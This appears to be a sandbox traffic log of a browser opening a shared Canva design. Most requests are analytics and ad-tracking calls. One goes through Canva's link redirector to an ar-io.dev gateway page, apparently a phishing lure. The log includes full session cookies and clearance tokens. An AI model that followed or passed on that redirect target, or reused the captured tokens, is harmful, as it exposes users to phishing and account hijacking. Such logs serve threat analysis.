Source: global trafficHTTP traffic detected: GET /_ajax/ae/createBatch HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor","ts":1732114910544,"utm_s":"editor","utm_m":"link"}; Metadata_visitor_id=m3q0hwbly0n1ejeak4k; Metadata_session_id=m3q0hwbmy0cpch0dnpm; _ga=GA1.1.1509316245.1732114914; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553; FPID=FPID2.2.I6NLagURRswYtrWhEjcR%2BV1rVDp99CgONTugSsmMaTU%3D.1732114914; FPLC=yYnxTqm5M9g7tWX5rpJjatUPTNcfdWD6Xmq%2B7VoIu03rCvYhYXbTU%2BVqQTDaLDcqMANWlofzMAL3JETgaK5UDEgRPf%2FUJhcVpP5QGA532pwwgtoBlEbJcN0vJrXs0Q%3D%3D
Source: global trafficHTTP traffic detected: GET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4bj0v872399471z8812729902za200zb812729902&_p=1732114904608&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&cid=1509316245.1732114914&ecid=1113172553&ul=en-us&sr=1280x1024&_fplc=0&ur=US-FL&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1732114904608&sst.ude=0&_s=2&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor&dr=&dt=Canva%20Design&sid=1732114914&sct=1&seg=0&en=new.user.engagement&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20290&ep.event_id=1732115097455_173211538951881&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=1&ep.custom_device_category=desktop&ep.custom_event_name=new.user.engagement&ep.custom_quantity=0&ep.custom_step=not%20set&ep.custom_user_type_by_user_id=guest&ep.event_action=no-value&ep.custom_cart_item=%5Bobject%20Object%5D&ep.custom_doctype_id=TACQ-gtv2Yk&ep.custom_product_variant=web-2&ep.custom_country_code=US&ep.custom_app_name=web&_et=6&tfd=33210&richsstsse HTTP/1.1Host: ct.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; _ga=GA1.1.1509316245.1732114914; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553; FPID=FPID2.2.I6NLagURRswYtrWhEjcR%2BV1rVDp99CgONTugSsmMaTU%3D.1732114914; FPLC=yYnxTqm5M9g7tWX5rpJjatUPTNcfdWD6Xmq%2B7VoIu03rCvYhYXbTU%2BVqQTDaLDcqMANWlofzMAL3JETgaK5UDEgRPf%2FUJhcVpP5QGA532pwwgtoBlEbJcN0vJrXs0Q%3D%3D
Source: global trafficHTTP traffic detected: GET /link?target=https%3A%2F%2F6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev%2F8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuI&design=DAGXBQfQ3AM&accessRole=viewer&linkSource=document HTTP/1.1Host: www.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor","ts":1732114910544,"utm_s":"editor","utm_m":"link"}; Metadata_visitor_id=m3q0hwbly0n1ejeak4k; Metadata_session_id=m3q0hwbmy0cpch0dnpm; _ga=GA1.1.1509316245.1732114914; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553; FPID=FPID2.2.I6NLagURRswYtrWhEjcR%2BV1rVDp99CgONTugSsmMaTU%3D.1732114914; FPLC=yYnxTqm5M9g7tWX5rpJjatUPTNcfdWD6Xmq%2B7VoIu03rCvYhYXbTU%2BVqQTDaLDcqMANWlofzMAL3JETgaK5UDEgRPf%2FUJ
Source: global trafficHTTP traffic detected: GET /p2?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=2124162551 HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: UID=18F9c60199021e57f0570b91732114914
Source: global trafficHTTP traffic detected: GET /activity;register_conversion=1;src=9812343;type=websi000;cat=flood0;ord=556796634;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=417781846;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor? HTTP/1.1Host: ad.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlaHLAQic/swBCPqYzQEIhaDNAQi5ys0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger=navigation-source, event-sourceReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=1119434276;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=1893244437;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor? HTTP/1.1Host: ad.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlaHLAQic/swBCPqYzQEIhaDNAQi5ys0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, trigger=navigation-sourceReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /activity;src=9812343;type=conve0;cat=canva008;ord=1119434276;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=1893244437;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor? HTTP/1.1Host: ad.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlaHLAQic/swBCPqYzQEIhaDNAQi5ys0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ajax/designinsight/heartbeats HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor","ts":1732114910544,"utm_s":"editor","utm_m":"link"}; Metadata_visitor_id=m3q0hwbly0n1ejeak4k; Metadata_session_id=m3q0hwbmy0cpch0dnpm; _ga=GA1.1.1509316245.1732114914; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553; FPID=FPID2.2.I6NLagURRswYtrWhEjcR%2BV1rVDp99CgONTugSsmMaTU%3D.1732114914; FPLC=5T4y3Aln1rq9tz4IP5pa2XLlMoT8sVjBne%2B7ZY3jjKITHDmZmuC8CFU7uPPJ3nzj4lD3skaWzRa7Sk22VvZkaXCzcC8ETNGf7ip%2BP6beUKCjAkpBcTbU3jEs8iTQZw%3D%3D
Source: global trafficHTTP traffic detected: GET /8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuI HTTP/1.1Host: 6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4bj0v872399471za200zb812729902&_p=1732114904608&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&cid=1509316245.1732114914&ecid=1113172553&ul=en-us&sr=1280x1024&_fplc=0&ur=US-FL&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&_eu=AEA&sst.tft=1732114904608&sst.sp=1&sst.em_event=1&sst.ude=0&_s=3&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor&dr=&dt=Canva%20Design&sid=1732114914&sct=1&seg=0&en=scroll&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20290&ep.event_id=1732115097455_17321153895180&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=no&ep.custom_consent_gtm_fpc_rtid=no&epn.custom_data_newSession2=0&ep.custom_device_category=desktop&ep.custom_event_name=gtm.init&ep.custom_quantity=0&ep.custom_step=not%20set&ep.custom_user_type_by_user_id=guest&ep.event_action=no-value&ep.custom_cart_item=%5Bobject%20Object%5D&epn.percent_scrolled=90&_et=15&tfd=38556&richsstsse HTTP/1.1Host: ct.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.canva.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20; _ga=GA1.1.1509316245.1732114914; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553; FPID=FPID2.2.I6NLagURRswYtrWhEjcR%2BV1rVDp99CgONTugSsmMaTU%3D.1732114914; FPLC=5T4y3Aln1rq9tz4IP5pa2XLlMoT8sVjBne%2B7ZY3jjKITHDmZmuC8CFU7uPPJ3nzj4lD3skaWzRa7Sk22VvZkaXCzcC8ETNGf7ip%2BP6beUKCjAkpBcTbU3jEs8iTQZw%3D%3D
Source: global trafficHTTP traffic detected: GET /activity;register_conversion=1;src=9812343;type=websi000;cat=flood0;ord=556796634;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=417781846;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor? HTTP/1.1Host: ad.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlaHLAQic/swBCPqYzQEIhaDNAQi5ys0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=1119434276;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=1893244437;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor? HTTP/1.1Host: ad.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlaHLAQic/swBCPqYzQEIhaDNAQi5ys0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/804757079/?random=170052841&fst=1732114917227&cv=10&fmt=3&label=YaxKCKTJlYwYENe83v8C&bg=ffffff&guid=ON&u_w=1280&u_h=1024&gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902&value=0&url=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor&tiba=Canva%20Design&data=event%3Dnew.user.engagement%3Bgtm_web_details%3DGTM-TZPTKRR%20%7C%20290%3Bevent_id%3D1732115097455_173211538951881%3Bcustom_dicbo%3Dnot%20set%3Bcustom_consent_gtm_outbrain%3Dyes%3Bcustom_consent_gtm_fpc_rtid%3Dyes%3Bcustom_data_newSession2%3D1%3Bcustom_device_category%3Ddesktop%3Bcustom_event_name%3Dnew.user.engagement%3Bcustom_quantity%3D0%3Bcustom_step%3Dnot%20set%3Bcustom_user_type_by_user_id%3Dguest%3Bevent_action%3Dno-value%3Bcustom_cart_item%3D%5Bobject%20Object%5D%3Bcustom_doctype_id%3DTACQ-gtv2Yk%3Bcustom_product_variant%3Dweb-2%3Bcustom_country_code%3DUS%3Bcustom_app_name%3Dweb&rdp=1&dma=0&npa=0&gcd=13l3l3l3l1l1&ec_mode=c&uip=8.46.123.0&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&pscdl=noapi&tag_exp=101925629~102067555~102067808~102077855~102081485&s3p=1&ct_cookie_present=false&crd=CLHBsQIIsMGxAgi5wbECCLHDsQIIisWxAgjCybECCOvGsQII08WxAiIBAUABSidldmVudC1zb3VyY2UsIHRyaWdnZXI7bmF2aWdhdGlvbi1zb3VyY2ViBAoCAgM&eitems=ChAIgK72uQYQmOOe_P6C3sR8Eh0AVyOINxMRtv-KPTA6TdqaiPVTQMlAeGyzy3Be1Q&pscrd=CO_BvIH0zKzk6wEiEwidz5n0luuJAxVOTqQEHd3gAhMyAggDMgIIBDICCAcyAggIMgIICTICCAoyAggCMgIICzICCBUyAggfMgIIEzICCBI6Fmh0dHBzOi8vd3d3LmNhbnZhLmNvbS8 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", 